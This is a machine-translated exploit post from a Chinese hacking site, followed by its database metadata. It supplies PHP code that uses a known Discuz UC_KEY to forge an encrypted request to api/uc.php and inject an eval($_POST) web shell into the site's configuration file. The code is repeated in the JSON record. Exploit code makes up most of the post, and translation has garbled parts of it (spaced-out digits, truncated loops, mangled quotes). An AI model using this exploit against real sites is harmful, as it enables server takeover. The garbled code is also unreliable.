DZ6. x UC_KEY getwebshell exploit-vulnerability warning-the black bar safety net
2015-11-23T00:00:00
ID MYHACK58:62201569289 Type myhack58 Reporter 佚名 Modified 2015-11-23T00:00:00
Description
Online dz 7. x and dz x Series uc_key use, today met a dz6. 0 website, so the analysis under the code, The change of use of the program, to share with people in need. uc_key getshell is a relatively wide presence of relatively long vulnerability, basically using the ucenter user center the program can be used, but the need according to the specific program to write a particular use. The latest version of the dz seems to be patched, there is no specific look at the code.
Note three places: 1. In dz6. x FOR xml parsing is not the same, so you need to modify the use of exp $post = uc_unserialize(uc_post_contents()); 2. Low version$UC_API and there is no escape, there is no need to submit 2 Pack $configfile = preg_replace("/define\('UC_API',\s'.?'\);/ i", "define('UC_API', '$UC_API');", $configfile); 3. The low version of the encryption function is not the same
Copy the code
// Code copyright belongs to the original author all!
$timestamp = time()+1 03 6 0 0;
$host="127.0.0.1";
$uc_key="Qfp1O0N3h5V356bbUdPer3958dp8X3b55dba9fkai7s3q7aby9i3hcnc7ec505sa";
$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));
$cmd1='
http://xxx\');eval($_POST[DOM]);//
';
$html1 = send($cmd1);
echo $html1;
function send($cmd){
global $host,$code;
$message = "POST /dz/api/uc. php? code=".$ code." HTTP/1.1\r\n";
$message .= "Accept: /*\r\n";
$message .= "Referer: ".$ host."\ r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: ".$ host."\ r\n";
$message .= "Content-Length: ". strlen($cmd)."\ r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
$fp = fsockopen($host, 8 0);
fputs($fp, $message);
$resp = ";
while ($fp && ! feof($fp))
$resp .= fread($fp, 1 0 2 4);
return $resp;
}
function _authcode($string, $operation = 'DECODE', $key = ", $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 1 6));
$keyb = md5(substr($key, 1 6, 1 6));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ";
$cryptkey = $keya. md5($keya.$ keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0). substr(md5($string.$ keyb), 0, 1 6).$ string;
$string_length = strlen($string);
$result = ";
$box = range(0, 2 5 5);
$rndkey = array();
for($i = 0; $i
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i
$j = ($j + $box[$i] + $rndkey[$i]) % 2 5 6;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i
$a = ($a + 1) % 2 5 6;
$j = ($j + $box[$a]) % 2 5 6;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 2 5 6]));
}
if($operation == 'DECODE') {
if((substr($result, 0, 1 0) == 0 || substr($result, 0, 1 0) - time() > 0) && substr($result, 1 0, 1 6) == substr(md5(substr($result, 2 6).$ keyb), 0, 1 6)) {
return substr($result, 2 6);
} else {
return ";
}
} else {
return $keyc. str_replace('=', ", base64_encode($result));
}
}
?& gt;
{"id": "MYHACK58:62201569289", "hash": "ee7481e958dff9d006cb67e44b92fac7e6a68de7d8adc7ec7454e8dc5eb43526", "modified": "2015-11-23T00:00:00", "history": [], "published": "2015-11-23T00:00:00", "type": "myhack58", "references": [], "objectVersion": "1.2", "lastseen": "2016-11-11T18:24:14", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "cvelist": [], "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "62431aac3b0516ca5138bf3523910997", "key": "description"}, {"hash": "7d8bdb7338ce586a5c59dcfe88fce0f0", "key": "href"}, {"hash": "21696611d742ee2c3099db77022fa31e", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "21696611d742ee2c3099db77022fa31e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "645396391020478112635e14b34a0f8b", "key": "reporter"}, {"hash": "7d1ab384224a1dfb95fb2dcf5a556fc0", "key": "title"}, {"hash": "0665a8b0792e65b50ab13aef58a018dc", "key": "type"}], "viewCount": 0, "description": "Online dz 7. x and dz x Series uc_key use, today met a dz6. 0 website, so the analysis under the code, The change of use of the program, to share with people in need. uc_key getshell is a relatively wide presence of relatively long vulnerability, basically using the ucenter user center the program can be used, but the need according to the specific program to write a particular use. The latest version of the dz seems to be patched, there is no specific look at the code. \n\nNote three places: 1. In dz6. x FOR xml parsing is not the same, so you need to modify the use of exp $post = uc_unserialize(uc_post_contents()); 2. Low version$UC_API and there is no escape, there is no need to submit 2 Pack $configfile = preg_replace(\"/define\\\\('UC_API',\\s*'.*?'\\\\);/ i\", \"define('UC_API', '$UC_API');\", $configfile); 3. The low version of the encryption function is not the same \nCopy the code \n// Code copyright belongs to the original author all! \n$timestamp = time()+1 0*3 6 0 0; \n$host=\"127.0.0.1\"; \n$uc_key=\"Qfp1O0N3h5V356bbUdPer3958dp8X3b55dba9fkai7s3q7aby9i3hcnc7ec505sa\"; \n$code=urlencode(_authcode(\"time=$timestamp&action=updateapps\", 'ENCODE', $uc_key)); \n$cmd1=' \nhttp://xxx\\');eval($_POST[DOM]);// \n'; \n$html1 = send($cmd1); \necho $html1; \nfunction send($cmd){ \nglobal $host,$code; \n$message = \"POST /dz/api/uc. php? code=\".$ code.\" HTTP/1.1\\r\\n\"; \n$message .= \"Accept: */*\\r\\n\"; \n$message .= \"Referer: \".$ host.\"\\ r\\n\"; \n$message .= \"Accept-Language: zh-cn\\r\\n\"; \n$message .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$message .= \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\\r\\n\"; \n$message .= \"Host: \".$ host.\"\\ r\\n\"; \n$message .= \"Content-Length: \". strlen($cmd).\"\\ r\\n\"; \n$message .= \"Connection: Close\\r\\n\\r\\n\"; \n$message .= $cmd; \n$fp = fsockopen($host, 8 0); \nfputs($fp, $message); \n$resp = \"; \nwhile ($fp && ! feof($fp)) \n$resp .= fread($fp, 1 0 2 4); \nreturn $resp; \n} \nfunction _authcode($string, $operation = 'DECODE', $key = \", $expiry = 0) { \n$ckey_length = 4; \n$key = md5($key ? $key : UC_KEY); \n$keya = md5(substr($key, 0, 1 6)); \n$keyb = md5(substr($key, 1 6, 1 6)); \n$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : \"; \n$cryptkey = $keya. md5($keya.$ keyc); \n$key_length = strlen($cryptkey); \n$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0). substr(md5($string.$ keyb), 0, 1 6).$ string; \n$string_length = strlen($string); \n$result = \"; \n$box = range(0, 2 5 5); \n$rndkey = array(); \nfor($i = 0; $i \n$rndkey[$i] = ord($cryptkey[$i % $key_length]); \n} \nfor($j = $i = 0; $i \n$j = ($j + $box[$i] + $rndkey[$i]) % 2 5 6; \n$tmp = $box[$i]; \n$box[$i] = $box[$j]; \n$box[$j] = $tmp; \n} \nfor($a = $j = $i = 0; $i \n$a = ($a + 1) % 2 5 6; \n$j = ($j + $box[$a]) % 2 5 6; \n$tmp = $box[$a]; \n$box[$a] = $box[$j]; \n$box[$j] = $tmp; \n$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 2 5 6])); \n} \nif($operation == 'DECODE') { \nif((substr($result, 0, 1 0) == 0 || substr($result, 0, 1 0) - time() > 0) && substr($result, 1 0, 1 6) == substr(md5(substr($result, 2 6).$ keyb), 0, 1 6)) { \nreturn substr($result, 2 6); \n} else { \nreturn \"; \n} \n} else { \nreturn $keyc. str_replace('=', \", base64_encode($result)); \n} \n} \n?& gt; \n\n", "href": "http://www.myhack58.com/Article/html/3/62/2015/69289.htm", "bulletinFamily": "info", "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "title": "DZ6. x UC_KEY getwebshell exploit-vulnerability warning-the black bar safety net"}
